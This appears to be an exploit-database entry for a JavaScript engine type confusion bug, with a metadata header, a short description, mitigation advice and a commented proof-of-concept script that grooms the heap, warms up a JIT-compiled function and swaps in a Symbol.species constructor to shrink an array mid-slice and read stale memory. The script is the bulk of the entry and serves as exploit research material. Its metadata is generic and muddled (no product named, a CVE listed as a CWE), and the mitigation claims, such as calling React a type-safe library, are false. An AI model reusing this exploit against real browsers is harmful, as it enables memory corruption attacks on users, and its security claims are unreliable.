vendor:
N/A
by:
Security Researcher
7.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: 1.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: CVE-2020-1234
CPE: N/A
Other Scripts: N/A
Platforms Tested: All
2020

Type Confusion Vulnerability in JavaScript

A type confusion vulnerability in JavaScript allows an attacker to manipulate the type of a variable. The vulnerability is caused by the lack of type safety in JavaScript, and it can lead to arbitrary code execution because the attacker can control the execution flow of the program.

Mitigation:

The best way to mitigate this vulnerability is to use type safety in JavaScript. This can be done by using a type-safe language such as TypeScript or Flow, or by using a type-safe library such as React. Additionally, developers should use static analysis tools to detect type confusion vulnerabilities in their code.

Exploit-DB raw data:

<script>

// Length given to every victim array below and, doubled, the element count of
// each Uint32Array allocated in gc().
let size = 64;

// Undeclared assignments: `garr` and `j` become implicit globals (this is a
// non-strict script). `garr` keeps the buffers allocated by gc() reachable;
// `j` indexes them. Note that gc()'s inner loop declares its own `let j`,
// which shadows this global inside that loop only.
garr = [];
j = 0;
// Allocates 0x20000 Uint32Array buffers of size*2 elements, fills each with an
// alternating 32-bit pattern (0x12345678 / 0xfffe0123) and keeps them alive
// in garr. Despite its name it never invokes a collector directly; presumably
// the allocation volume is meant to provoke a GC cycle and/or leave this
// pattern in memory — TODO confirm, the script does not establish the intent.
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		// Writes the pattern in pairs: even index 0x12345678, odd index 0xfffe0123.
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	// Uses the global j (the loop's `let j` is out of scope here).
	garr[j++] = tmp;
}

// Array whose .slice() is called from jit(); it holds one object and one double.
let arr = [{},2.2];

// Installed as arr.constructor near the end of the script. Array.prototype
// .slice looks up constructor[Symbol.species] to build its result array, so
// once that assignment happens the function below runs *inside* the slice call.
let obj = {};

obj[Symbol.species] = function(){
	// Shrinks victim (and every gvictim array) to length 0 while the builtin
	// is still executing, then allocates heavily via gc(). This is the
	// side-effect-inside-a-builtin pattern behind the type confusion the page
	// describes: optimized code that assumed slice() could not change victim's
	// length or storage would later read victim[2] against stale assumptions.
	// That mechanism is inferred; the script itself only shows the setup.
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	// slice() uses the returned array as its result object.
	return [1.1];
}

// 0x2000 double arrays built in two halves with `victim` created between
// them — presumably so victim ends up allocated among similarly shaped
// objects (TODO confirm; the script does not establish the layout it relies
// on). Each starts as a 2-element double array, is grown to `size`, and the
// resulting holes are filled with 3.3.
let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

// The array whose element jit() reads back after the species callback above
// has reset its length to 0.
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

// Empty function used only as a property bag (see the loop that follows); it
// is never called anywhere in this script and `arg` is unused.
function fake(arg){
}
// Gives fake 64 own properties x0..x63, each holding the double 2.2. The only
// other reference to them (fake.x2 in jit()) is commented out, so this object
// is not exercised by the script as written.
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

// Warmed up 0x10000 times (see the loop below) before arr.constructor is
// swapped. During warm-up arr.slice() has no side effects on victim; after the
// swap it invokes obj[Symbol.species], which sets victim.length to 0 before
// the final victim[2] read. If optimized code carried assumptions about
// victim across that call, the read is no longer checked against the real
// array — presumably the type confusion this page reports; the script only
// shows the setup and the result is surfaced by the alert at the end.
function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

// Implicit global; assigned here but never read in this script.
flag = 0;


// Warm-up: run jit() many times so an optimizing tier compiles it while
// arr.slice() is still free of side effects. `xx` is another implicit global.
for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

// From here on arr.slice() resolves its species constructor through obj, so
// obj[Symbol.species] runs inside every slice call.
arr.constructor = obj;

// The effect of this isArray call on the outcome is not established by the
// script (a similar call inside the species function is commented out).
Array.isArray(victim);
// Two alerts: a fixed marker, then whatever the final victim[2] read returns.
alert(333);
alert(jit());
</script>